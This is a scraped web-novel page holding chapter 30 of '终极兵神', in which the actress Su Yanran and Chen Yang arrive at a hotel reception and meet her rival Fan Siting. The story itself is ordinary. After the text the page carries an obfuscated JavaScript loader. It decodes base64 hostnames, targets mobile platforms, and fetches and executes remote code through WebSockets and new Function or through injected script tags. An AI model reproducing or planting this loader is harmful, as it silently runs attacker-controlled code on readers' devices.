笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 终极兵神 > 第30章 不作不会死

第30章 不作不会死

不想错过《笔趣阁》更新?安装笔趣阁专用APP,作者更新立即推送!

放弃立即下载
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
龙登大酒店
  作为大明星,苏嫣然重来没有等过人。她今天竟然破天荒地在外面等人等了半个小时。而且还是等一个男人。
  苏嫣然看看时间,酒会的时间快到。某人估计不敢来了吧。
  枉自己对他还抱有一点期望。期望他能解决自己眼下的困局。
  某人不来,自己只能独自一人孤身闯龙潭了。
  《火焰白日》这部戏的女主角,苏嫣然是比较看重的。但也没轮到孙元明拿着它来威胁自己的地步。毕竟苏嫣然的名气在那里,想接什么样的大戏都有。
  可孙元明却好像摸清了苏嫣然的脾气,据说准备新请的女主角,是苏嫣然在这个圈子里面最讨厌的一个女明星。那苏嫣然就咽不下这口气了。
  今晚无论陈阳来不来,她都必须来。
  苏嫣然走下保姆车,准备往酒里面走去。
  穿着晚礼服的苏嫣然刚往前走两步,突然在她眼前多了一束小黄花。苏嫣然还没明白什么回事,耳边就响起某人贱贱的声音,“亲爱的,等了很久了吧。这小黄花是我专门摘给你的。”
  苏嫣然转头看去,这声音不是陈阳是谁呢。
  苏嫣然看着眼前这个不知道在那里摘来的小黄花,她真的感到又好气又好笑的。
  “哼,我还以为,你怕了。”苏嫣然拉下脸冷道。
  怕?
  陈阳心里暗笑一下。
  不过他脸上还是很认真地答道,“亲爱的,你放心吧。无论以后的路有多难走,有多么让人害怕,我都会陪你走完的。”
  “呸。谁要陪你走远。”苏嫣然打量一下陈阳,她脸又拉下来,“我不是叫湘云姐给你买衣服了么?你怎么还穿着成这样过来!”
  陈阳身上穿着的还是他那身地摊货。穿这种地摊货出现在这种场合,苏嫣然感到有点丢不起这个人。
  陈阳整个下午都在医院,直到苏嫣然催他就赶过来。连家都没回过,那里有时间换衣服。
  “你今晚准备怎么办?孙元明不会那么轻易放过你的。”
  苏嫣然没有把重点放在陈阳穿什么,她想知道的是,陈阳想怎样解决。
  “当然是给孙元明认错道歉。为了老婆的角色,抛头颅,洒热血都在所不辞。”陈阳拍着胸膛说着。
  苏嫣然听着陈阳这话,她眼里还是透出几分淡淡的失望。不过她没说什么就大步往里面走着。
  “哎呦,这不是嫣然么?我真没想到,你今晚还敢过来。咯咯。真不要脸。”
  陈阳跟着苏嫣然刚走到酒会厅门口,旁边就响起一把充满着讥笑的声音。
  陈阳转头看去,不远处就有一个化着浓妆,穿着红色晚礼服,长得还挺不错的女人,带着两个穿着西装的保镖一脸嘲笑的表情走过来。
  这女人陈阳认识,也是一个女明星,好像叫范思葶。前几年拍了一部戏红了一把,后面就一直半红不紫,没有拿得出手的作品。
  “我有什么不敢来的呢?”苏嫣然咬着银牙轻道。
  范思葶是她在这个圈子里面最讨厌的人之一,当年苏嫣然刚出道的时候,她借着自己有点红,处处打压着苏嫣然。不止这样,有几次她靠潜规则出卖自己,还抢了苏嫣然几部戏。本来抢戏没什么,苏嫣然就受不了,范思葶抢走后,还回过头对你冷嘲热讽的。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x65\x68\x41\x6b\x6e\x45\x69\x5a\x4a\x46']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vaXNrZGprZmxzLnRzemhvbmd0aWFuc2hpamkuYY29t','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['Y','O']);}:function(){};